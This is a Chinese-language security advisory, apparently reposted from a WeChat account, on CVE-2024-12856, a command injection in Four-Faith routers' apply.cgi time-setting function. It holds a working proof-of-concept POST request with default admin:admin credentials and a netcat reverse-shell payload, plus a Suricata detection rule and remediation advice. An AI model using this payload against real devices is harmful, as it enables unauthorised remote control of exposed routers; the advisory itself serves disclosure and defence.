CVE-2024-12856 四信Four-Faith路由器存在命令注入漏洞

CVE-2024-12856漏洞描述

Four-Faith 路由器型号 F3x24 和 F3x36 受到操作系统 (OS) 命令注入漏洞的影响。至少固件版本 2.0 允许经过身份验证的远程攻击者在通过 apply.cgi 修改系统时间时通过 HTTP 执行任意 OS 命令。此外，此固件版本具有默认凭据，如果不更改，将有效地将此漏洞转变为未经身份验证的远程 OS 命令执行问题。

CVSS 评分

7.2

漏洞详情

由于该漏洞仅当远程攻击者能够成功验证身份时才会起作用，因此其严重性较低。但是，如果与路由器关联的默认凭据未更改(admin:admin)，则可能导致未经验证的操作系统命令执行。

在 VulnCheck 详述的攻击中，发现未知威胁行为者利用路由器的默认凭据来触发 CVE-2024-12856 的利用并启动反向 shell 以实现持久远程访问。

此次攻击尝试源自 IP 地址178.215.238[.]91，该地址之前曾用于试图利用CVE-2019-12168进行攻击，这是影响 Four-Faith 路由器的另一个远程代码执行漏洞。据威胁情报公司 GreyNoise 称，最近一次利用 CVE-2019-12168 的尝试是在 2024 年 12 月 19 日。

Jacob Baines 在一份报告中表示： “至少可以通过 HTTP 使用 /apply.cgi 端点对 Four-Faith F3x24 和 F3x36 进行攻击。通过submit_type=adjust_sys_time 修改设备的系统时间时，系统容易受到 adj_time_year 参数中的操作系统命令注入攻击。”

Censys 的数据显示，有超过 15,000 台面向互联网的设备。有证据表明，利用该漏洞的攻击可能至少从 2024 年 11 月初就开始了。

CVE-2024-12856 POC

以下 POST 请求演示了如何反弹 shell

POST /apply.cgi HTTP/1.1
Host: 192.168.1.1:90
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
Content-Length: 296
Authorization: Basic YWRtaW46YWRtaW4=
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip
adj_time_sec=32&change_action=gozila_cgi&adj_time_day=27&adj_time_mon=10&adj_time_hour=11&adj_time_year=%24%28cd+%2Ftmp%2F%3B+mknod+bOY+p%3Bcat+bOY%7C%2Fbin%2Fsh+-i+2%3E%261%7Cnc+192.168.1.206+1270+%3EbOY%3B+rm+bOY%3B%29&adj_time_min=35&submit_button=index&action=Save&submit_type=adjust_sys_time

解码后如下所示

adj_time_sec=32&change_action=gozila_cgi&adj_time_day=27&adj_time_mon=10&adj_time_hour=11&adj_time_year=$(cd /tmp/; mknod bOY p;cat bOY|/bin/sh -i 2>&1|nc 192.168.1.206 1270 >bOY; rm bOY;)&adj_time_min=35&submit_button=index&action=Save&submit_type=adjust_sys_time

20938 admin     1640 S    sh -c rtc_tm ss $(cd /tmp/; mknod WaO p;cat WaO|/bin
20940 admin     1640 S    sh -c rtc_tm ss $(cd /tmp/; mknod WaO p;cat WaO|/bin
20942 admin     1636 S    cat WaO
20943 admin     1636 S    /bin/sh -i
20945 admin     1636 S    nc 192.168.1.206 1270

对于那些对漏洞有着百科全书般记忆的人来说，这个漏洞不应与CVE-2019-12168混淆。虽然两者都流经端点apply.cgi，但它们攻击的是不同的底层组件（CVE-2019-12168 攻击submit_type=start并在参数中有一个操作系统注入ping_ip）。

VulnCheck 发现178.215.238[.]91试图利用此漏洞。此外，我们注意到这篇 2024 年 11 月的博客也提到了利用此漏洞。他们观察到的 User-Agent 甚至与 VulnCheck 在野外观察到的 User-Agent 相匹配（尽管我们看到了完全不同的有效载荷）。

检测方法

VulnCheck Initial Access团队编写了以下 Suricata 规则来检测网络上的 CVE-2024-12856：

alert http any any -> any any ( 
    msg:"VULNCHECK Four-Faith CVE-2024-12856 Exploit Attempt"; 
flow:to_server; 
    http.method; content:"POST"; 
    http.uri; content:"/apply.cgi"; startswith; 
    http.header_names; content:"Authorization"; 
    http.request_body; content:"change_action="; 
content:"adjust_sys_time"; 
    pcre:"/adj_time_[^=]+=[a-zA-Z0-9]*[^a-zA-Z0-9=]/"; 
    classtype:web-application-attack; 
    reference:cve,CVE-2024-12856; 
    sid:12700438; rev:1;)

漏洞修复建议

目前尚无关于补丁可用性的信息，但 VulnCheck 表示已于 2024 年 12 月 20 日负责任地向这家中国公司报告了该漏洞。Hacker News 在本文发布之前已联系 Four-Faith 征求意见，如果收到回复，我们将更新本文。

修改默认口令

原文始发于微信公众号（云梦安全）：CVE-2024-12856 四信Four-Faith路由器存在命令注入漏洞